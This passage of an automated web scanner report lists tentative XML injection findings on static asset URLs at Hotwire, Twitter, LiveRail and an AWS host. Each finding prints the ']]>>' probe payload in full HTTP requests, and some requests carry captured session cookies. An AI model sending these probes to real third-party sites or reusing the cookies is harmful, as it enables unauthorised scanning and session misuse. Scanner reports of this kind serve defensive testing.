Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:00 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.203. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/overall/3.5.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols/overall]]>>/3.5.gif?ver=185464 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.204. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/overall/3.5.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols/overall/3.5.gif]]>>?ver=185464 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.205. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png?ver=177999 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:55 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.206. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png?ver=177999 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.207. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/tripWatcher]]>>/passiveModule/shoppingTools/img-tw-side-module.png?ver=177999 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:02 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.208. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/tripWatcher/passiveModule]]>>/shoppingTools/img-tw-side-module.png?ver=177999 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535997
Date: Mon, 03 Oct 2011 01:02:05 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.209. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/tripWatcher/passiveModule/shoppingTools]]>>/img-tw-side-module.png?ver=177999 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:10 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.210. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png]]>>?ver=177999 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:15 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.211. http://lb-static1-1568763564.us-east-1.elb.amazonaws.com/pix.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://lb-static1-1568763564.us-east-1.elb.amazonaws.com
Path:   /pix.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pix.gif]]>>?acct_id=4079&ptype=product&cat=HOTEL&is_paid=0&prod_id=10417&prod_name=The%20Boston%20Park%20Plaza%20Hotel%20%26%20Towers&search_term=&session_id=DFE4F06BE571072B&is_conversion=&basket_value=&order_id=&version=0.2&url=http%3A%2F%2Fwww.orbitz.com%2Fshop%2Fhotelsearch%3Ftype%3Dhotel%26hotel.keyword.key%3DBoston%252CUnited%2520States%26hotel.rooms%5B0%5D.adlts%3D1%26hotel.type%3Dkeyword%26hotel.chkin%3D10%2F04%2F11%26hotel.chkout%3D10%2F07%2F11%26search%3DSearch%26WT.mc_ev%3Dclick%26WT.mc_id%3Do_igo_merch_city_dated%26gcid%3DC11287x600-CYBoston%2CUnited%2520States%26lpid%3Dplhot%26hsv.showDetails%3Dtrue%26hotel.hid%3D10417%26hotel.hkey%3D10417_null_null_null_A1%3A0&ref=http%3A%2F%2Fwww.orbitz.com%2Fshop%2Fhotelsearch%3Ftype%3Dhotel%26hotel.keyword.key%3DBoston%252CUnited%2520States%26hotel.rooms%5B0%5D.adlts%3D1%26hotel.type%3Dkeyword%26hotel.chkin%3D10%2F04%2F11%26hotel.chkout%3D10%2F07%2F11%26search%3DSearch%26WT.mc_ev%3Dclick%26WT.mc_id%3Do_igo_merch_city_dated%26gcid%3DC11287x600-CYBoston%2CUnited%2520States%26lpid%3Dplhot&sid=undefined&cookie=uid%3D999836241826%3A&cookie2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A&rand=0.5940432497300208&type=pageview&title=Boston HTTP/1.1
Host: lb-static1-1568763564.us-east-1.elb.amazonaws.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=10417&hotel.hkey=10417_null_null_null_A1:0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:32:28 GMT
Server: lighttpd/1.4.19
Content-Length: 345
Connection: keep-alive

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.212. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/images/t.gif?_=1317601602154&count=none&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&text=CME%20Group%20%E2%80%93%C2%A0How%20the%20World%20Advances&url=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&twttr_referrer=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&twttr_li=0&twttr_widget=1&twttr_guest_id=v1%3A131479755238577138 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://platform.twitter.com/widgets/tweet_button.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __qca=P0-1403506059-1316475190092; k=10.35.22.124.1317385056818946; __utma=43838368.1721518288.1314976448.1317595795.1317595795.7; __utmz=43838368.1317595795.6.6.utmcsr=status.twitter.com|utmccn=(referral)|utmcmd=referral|utmcct=/; ab_sess_remember_me_on_signup_83=1; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCHWE8cyAToHaWQiJTc2YzZjNDk3OTg0ZmYw%250AYTg0NjYyZDg4MzE0MjFhMzBjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--72922723a18796dbaf00ccaa2433d31f37abc106

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Mon, 03 Oct 2011 00:27:03 GMT
Connection: close
Connection: Transfer-Encoding
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>57CD7457A89B31BB</RequestId><HostId>GU0XoMztLijyhyzGUkjTrWjc5+iwfzAdGa6I5F+SYntsFSDeBE
...[SNIP]...
8.213. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images]]>>/t.gif?_=1317601602154&count=none&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&text=CME%20Group%20%E2%80%93%C2%A0How%20the%20World%20Advances&url=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&twttr_referrer=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&twttr_li=0&twttr_widget=1&twttr_guest_id=v1%3A131479755238577138 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://platform.twitter.com/widgets/tweet_button.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __qca=P0-1403506059-1316475190092; k=10.35.22.124.1317385056818946; __utma=43838368.1721518288.1314976448.1317595795.1317595795.7; __utmz=43838368.1317595795.6.6.utmcsr=status.twitter.com|utmccn=(referral)|utmcmd=referral|utmcct=/; ab_sess_remember_me_on_signup_83=1; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCHWE8cyAToHaWQiJTc2YzZjNDk3OTg0ZmYw%250AYTg0NjYyZDg4MzE0MjFhMzBjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--72922723a18796dbaf00ccaa2433d31f37abc106

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Mon, 03 Oct 2011 00:27:07 GMT
Connection: close
Connection: Transfer-Encoding
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>22C9FA4DDDCA5147</RequestId><HostId>j5UfIaXBC8rSIUR9TcCWnWDMm8gLoM+HfzpNlS410wtM+H/F9A
...[SNIP]...
8.214. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images/t.gif]]>>?_=1317601602154&count=none&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&text=CME%20Group%20%E2%80%93%C2%A0How%20the%20World%20Advances&url=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&twttr_referrer=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&twttr_li=0&twttr_widget=1&twttr_guest_id=v1%3A131479755238577138 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://platform.twitter.com/widgets/tweet_button.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __qca=P0-1403506059-1316475190092; k=10.35.22.124.1317385056818946; __utma=43838368.1721518288.1314976448.1317595795.1317595795.7; __utmz=43838368.1317595795.6.6.utmcsr=status.twitter.com|utmccn=(referral)|utmcmd=referral|utmcct=/; ab_sess_remember_me_on_signup_83=1; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCHWE8cyAToHaWQiJTc2YzZjNDk3OTg0ZmYw%250AYTg0NjYyZDg4MzE0MjFhMzBjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--72922723a18796dbaf00ccaa2433d31f37abc106

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Mon, 03 Oct 2011 00:27:10 GMT
Connection: close
Connection: Transfer-Encoding
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F8BDF00D2A10ACC7</RequestId><HostId>fY+AdomI4rctTRKq0k6+slenvgeINOPhDBuAoOszAcAW6TGKhX
...[SNIP]...
8.215. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://vox-static.liverail.com
Path:   /swf/v4/admanager.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /swf]]>>/v4/admanager.swf HTTP/1.1
Host: vox-static.liverail.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lr_uid=17200647; lr_uds=a%3A1%3A%7Bi%3A1001%3Bi%3A1315103266%3B%7D

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 69E4976B5C624131
x-amz-id-2: 6gh8/rOCz74TqZ1e8TlM/rGSMHTZb19o8e15rtmFfNEv8hTObVauRUTh2C8gsylj
Content-Type: application/xml
Server: AmazonS3
Date: Sun, 02 Oct 2011 23:51:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>69E4976B5C624131</RequestId><HostId>6gh8/rOCz74TqZ1e8TlM/rGSMHTZb19o8e15rtmFfNEv8hTObV
...[SNIP]...
8.216. http://vox-static.liverail.com/swf/v4/admanager.swf [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://vox-static.liverail.com
Path:   /swf/v4/admanager.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /swf/v4]]>>/admanager.swf HTTP/1.1
Host: vox-static.liverail.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lr_uid=17200647; lr_uds=a%3A1%3A%7Bi%3A1001%3Bi%3A1315103266%3B%7D

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 39C23244E0C098A6
x-amz-id-2: nCQyemJNRgTiKhtWoMKeI/ERiQ+lCxTllf7RoUuSJWsrL0TglkeBkvu2+X70KZ3C
Content-Type: application/xml
Server: AmazonS3
Date: Sun, 02 Oct 2011 23:51:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>39C23244E0C098A6</RequestId><HostId>nCQyemJNRgTiKhtWoMKeI/ERiQ+lCxTllf7RoUuSJWsrL0Tglk
